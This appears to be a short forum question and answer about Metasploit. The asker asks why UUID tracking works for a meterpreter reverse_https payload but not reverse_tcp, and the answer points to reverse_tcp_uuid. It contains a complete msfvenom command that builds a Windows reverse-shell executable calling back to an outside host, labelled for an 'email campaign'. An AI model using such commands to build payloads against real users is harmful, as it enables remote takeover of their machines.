# Meterpreter reverse_tcp stager and UUID tracking

Tags: metasploit

I'm trying to create *meterpreter/reverse_tcp* stager, with UUID tracking, but **~/.msf4/payloads.json** isn't created.

This is msfvenom command:

```
msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp LHOST=example.com LPORT=4444 PayloadUUIDTracking=true PayloadUUIDName=EmailCampaign20150101 -f exe -o payload.exe
```

But when I change payload to the **meterpreter/reverse_https**, so everything works as expected.

What does it mean? reverse_tcp stagers don't support UUID?
Because when I look to the ASM code for the **meterpreter/reverse_tcp** stager, so it contains a section where UUID is sent. https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_tcp.rb#L179

Thank you for your suggestions.

Answer (score 0):

reverse_tcp_uuid payload and handler supports UUID tracking.